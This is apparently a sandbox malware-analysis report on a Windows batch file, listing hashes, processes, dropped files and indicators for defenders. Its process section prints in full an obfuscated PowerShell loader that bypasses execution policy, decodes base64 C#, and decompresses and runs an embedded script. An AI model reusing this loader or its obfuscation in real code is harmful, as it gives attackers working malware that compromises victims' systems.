analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

itlala.bat

Full analysis: https://app.any.run/tasks/f8fe8781-a27c-475b-bc10-36fd0b1621b4
Verdict: Malicious activity
Analysis date: October 14, 2019, 10:02:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

FB05C57CD1936FFB0CEAB5BEAEFCCD3D

SHA1:

B6017C7FABABEAC6169752BFF618980FEE00E06A

SHA256:

9D4E16A3F2632F42AF871B3B80BED7E1EA8F443EB7AED9E6EAA214784D3EB508

SSDEEP:

96:YwEYxbBpzZmyUT8vlNjAaNxQRA4MdYEk6UDP1FvO7EkQ0aWWfZ:5x3Ku5AavEA4l56UDP1I7bWfZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 2252)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2744)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2252)
  • INFO

    • Manual execution by user

      • explorer.exe (PID: 2580)
      • explorer.exe (PID: 2420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe no specs csc.exe explorer.exe no specs explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2744cmd /c ""C:\Users\admin\AppData\Local\Temp\itlala.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2252powersHeLl -nop -NonintErACti -Win 000000000000001 -exEcutioNpo bypASs .(('Set-'+'Va')+'ri'+('a'+'ble')) -Name ('dq') -Value ([Text.Encoding]::"\"Ut`F8"\"."\"Get`sT`RiNG"\"([Convert]::(('F'+'ro')+('m'+'Ba')+'se'+'64'+('S'+'tri'+'ng')).Invoke(('dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb'+'25zLk9iamVjd'+'E1vZGVsOw0KdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0K'+'dXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLklPLkNv'+'bXByZXNzaW9uOw0KDQpwdWJsaWMg'+'Y2xhc3MgSk9iVnpqQnlKd0lnRVBxd1lMdkxEZWFsVXtwdWJsaWMgc3RhdGljIHZvaWQgZFJhVVljT0NjRWZucUFHbUlsWktGY1Fucigpe1Bvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOw0Kc3RyaW5nIGZyZT0iSXdnQUFCK0xDQUFBQUFBQUJBQk5'+'sY2Z'+'PM0lv'+'TmhWL0Zpd3Y0TjVSWWRWVHVUb'+'TJrVWUvTjhFSjkxSHRGSGo3am0wMTJCQThKRUNSNHZpK05QLzQ5TURX'+'Zk90L3N5M1p5OWVkTC8ybXZWazUzRmg5bitmejE5WDhsSDQzVlZjUGlGN3ZTKzU5Y1hpaXh3eS9Pbk1mcTE2K1AydVdkYm9YMlA0bmYzMzZsZytibGx2UDc3NytmODlBbDhaTGp'+'tTzFZcjc3OCt2WTk4S0k1b3dhTU42RFpxQjlMN'+'2E5SHlW'+'MDRTKzZqM'+'Ex5R0RiT1Jqa'+'nZqcTI0'+'dmtRNVNZVFBrVjluQ1ZBYWk5WFkxSTBQUjYrUll0d0xmRVdESnhMUnZ'+'ZWnpiRGh5'+'Z1hoYW8valdBbnRnNkR4TnU0UTFZM09jQTQ3Z0lnRnM0bjZUS0d3Z'+'1JXVDJDMkVUSG9DNlZYUG41ZXRqcFpGQlJSd3dIYUw5elFpWDdRSkNqaHNqQlk2VnVvWXlaZXF'+'udVdKSWE0dUh1UUdVVVRIak5ROFNUeTRwcytTVUtycDNxeTc'+'0alJFe'+'TFIa1Y0V1pFdHNKT3QvR0NjZVphbmpyTENxRHRGQVNnazhvNVFEK21kaFhsbjkxTzNhZ0N2VWM4SmVmUkhMTDI5bmdtWE14K1ZuSGtZL2wxN3BVald0a25iMEpOVDJKbUVMbGwrTnB1ODkvQ1VTQmxFZ2NqeTdwSmx'+'mVGJ4TStsZFd6N0ppaVJBRi9Ua3Z1c0ltamhobG10S1'+'lRejlrRHRDMHNwWDU5RnIzTEVLczRrL2xKZWVITjVKY3U'+'4U0xEZkRwSFVES1JJaHVsWExpYUp1emJybHM4MmVFSzYybHlQSERCL0xTYzR4YytUK2dxUXpWa2t4M0tsQUxXa0ZWQ'+'1FSNHJrV2tTKytvcXNENEljUHhydkZkREVPVXdISEZyVmEzVXZ3WjV'+'rVFVzamFMNEJqT2dwbFZvNnNncWRieW9SRStXeVVZZ2UxaFNzbTdNdEt'+'XMHdKekNDTm5oc1pucnRu'+'Y2h5dTdnVmU2aVVWO'+'UcxRjZwOUx2UWt5ZnJqNm5mcE9jTTJOM3pNTTErSnpOcmNqZFpnNkx5MUNva1B6cGxFazl'+'xeTcwT1NaTWdzSHVKLzhoQkUwNFN'+'ZQXBIV1dRNC9kV'+'EpCMEZTQmVXRUlnNkh6UW43SGFPYmFob2wwR'+'2RCWnprYWFmNm1FaXpIRGVOMVVLaU45R3ZkUW5EOWllNU56eW16WTJYZHg2dkZHQ'+'0tVU3RkaFdodzZrWEwwcHUxN1NQMXcwb3JIWDBlM2R'+'hUlpvcDh3MVdnOG1TTTU4YVpncEhodHVQRFZCME1yRXlLUGVzd2tGZDBxcFNjZ3AxSHZNNlFqTnNVczJtRHQ1VHJJV'+'2RXMStrNWdQT0JMMC'+'92Mk'+'gwbStFL1l5Z29xcnlzamRMbWZmTFI1cnFaeDVOeUtyUzBJYmR5Qksxc2pCR1h5M1V6UXA2QjJKc1loZSs3TW'+'ppV2xBdkNFVzl'+'tVVB4M05nZ3'+'g3ejR2RzREWk'+'hGckk5ZjBvL1lLR3VFYmFPcGJndlV'+'2Y3QydTlqTjB1SHl6UTRMbHZhenpTRmk2bW1JTVFwUGpyaVJzWlBQTGRvVk44MXErcHpLVGxCdlFvSkdtR0xxT3RQRzU1dUJlRlFBaFNpUy9FWlV2cW9jTjZqTmV1THZsQnRqL29YblM4cW9GWElNbmlaTTBseXRGT'+'U5RSW9kVVRjR1hXMitENEhKZHdtYStzejdQQ'+'kpTYnBEaUVHZkp'+'LSyt5clZ4T1NERlNPZHNzeEIv'+'RUFSTFN4cFJ1Tnc2cmlRa1g4c05hdmNLSWF6dH'+'h4UDE3R'+'isrY2tYWVNOOHhEcmtCNEtDaStuN0MxanZDSkpxWHBMeVJucGl6MHdUWmV3VGlGcTBOMCsybV'+'hUSWp'+'kbzZIVDdVc1FxREdCZ0ZNVGtPRU5LbHRha3kyWVlpc2FJY1Z'+'lbVIxbUFrZk5Rc1NVclBtazR2OElsQ0NseWVpcGp5Zk1HS2M0aU01'+'NFBFQlljdml1Rm4rVWtMQ2JzSWNJU2wrTkR3TzVRdnoyV0RJRmZVNWc0L0pwTldRVUxzaDByZ1Zqa1ZIcTE0cXRuZ24yaU9KVTVXdnpJSzFLV045eXh'+'SU2FrSlVmVURyY3o4MUdhd1BTRzdBNmwyaytpVUU3dFZzQ2UyeERxcXNSZ21xRlVnai9hc1VNbEhFZGNVa0ZwWXk0Wk5pZHFJYmF0M1FOaXdEaHJnRG9aRnYrbzhkcUNFRjZzakhNWXNzZVlHRUE1d01IRTlnYVd4QTN2TGk3SVpjNjNPSnYreGU4UU'+'ZBNkprdVQ5Y2haamt1RkpWYU0zbHBaM3ZHeGlCeDdTYmN2Y'+'m'+'UxOUF4RU5ObjltYjI3VE1oN2xRTTZaVythRzVkSDBTRUMrV2l4VnEvaTBZcnRzOE5lM1RraTRoZ2tsMjd4L2drRlF3Mz'+'BCTVpHWUptWWp1dUJIR2pCTDVkcnphSmNjUUFDS2hvOWhB'+'bHh6b'+'1VLSEJKZlMramlBTk1TU0RiQjlwd0dJcWw5MmpldVliQTJvLzFkYjV1ckFkeXpKTVBrQWdL'+'WFk3M0pEK3hSdFl3bE9KaEhaMko2TjNFVms3en'+'gyaE42Rm0yQUdMQ1p'+'VTklhMmdqUzlFVkM'+'1SE'+'RmdThBU3lSYlR1eERCWVc5OUpteXAzSWJLWE5tQm1NcGROMmdQYU4xSjV2dTNILy8'+'2dFlUMitnZk93eDhBanpOdkw2K2gveWUyOG1XcEJxM1RPZjdEMlN4bmh6ODVlL254'+'NlhMeWMvMlphK3pBVlZyNVVlbUZmV'+'lUvZnZ5Y1AyaGZoMXpqdm43ODUrZlh0Ny9zTjk4cVZmWUwvZzM4dFlqNS8yTDBOL0Q5L1A3anZ3cVE3VFFqQ0FBQSI7DQpieXRlW10gZ1ppcEJ1ZmZlcjIgPSBDb252Z'+'XJ0LkZyb21CYXNlNjRTdHJpbm'+'coZnJlKTt1c2luZyAodmFyIG1lbW9yeVN0cmVhbSA9IG5ldyBNZW1vcnlTdHJlYW0oKSl7aW50IGRhdGFMZW5ndGggPSBCaXRDb252ZXJ0ZXIuVG9JbnQzMihnWmlwQnVmZmVyMiwgMCk7bWVtb3J5U3RyZWFtLldyaXRlKGdaaXBCdWZmZXIyLCA0L'+'CBnWmlwQnVmZmVyMi5MZW5ndGggLSA0KTt2YXIgYnVmZmVyID0gbmV3IGJ5dG'+'VbZGF0YUxlbmd0aF07'+'bWVtb3J5U3RyZWFtLlBvc2l0aW9uID0gMDt1c2luZyAodmFyIGdaaXBTdHJlYW0gPSB'+'uZXcgR1ppcFN0'+'cmVhbShtZW1vcnlTdHJlYW0sI'+'ENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzKSl7Z1pp'+'cFN0cmVhbS5SZWFkKGJ1ZmZlciwgMCwgYnVmZmVyLkxlbmd0aCk7fWZyZT0oRW5jb2RpbmcuVVRGOC5HZXRTdHJpbmcoYnVmZmVyKSk7fQ0KcHMuQWRkU2Ny'+'aXB0KGZyZSk7cHMuSW52b2tlKCk7fX0='))));.('Ad'+('d-T'+'ype')) -TypeDefinition ${dQ};[JObVzjByJwIgEPqwYLvLDealU]::('d'+('R'+'aUY'+'cOC')+('cE'+'fnq')+'AG'+'mI'+('lZ'+'KFcQnr')).Invoke()C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2440"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
1
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2420"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2580"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
279
Read events
224
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVXUH64Q0M6M2DSKZ9P.temp
MD5:
SHA256:
2440csc.exeC:\Users\admin\AppData\Local\Temp\ijmcfqca.pdb
MD5:
SHA256:
2440csc.exeC:\Users\admin\AppData\Local\Temp\ijmcfqca.out
MD5:
SHA256:
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a6e9.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2252powershell.exeC:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdlinetext
MD5:EB06EA4803DD2B690C2161FECFB71E12
SHA256:02DCDDBA38B22BF70450534D54589A23652FE1EA19DF8EA6C98ABFDD27D827B0
2252powershell.exeC:\Users\admin\AppData\Local\Temp\ijmcfqca.0.cstext
MD5:03D5D9EEE5C82DFD30330B80FF0E58E9
SHA256:1A25B6E5B17421FAC5BF765671E268DFAC0B8C0C669A4742A2D369EA01BDCB5B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
Process
Message
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144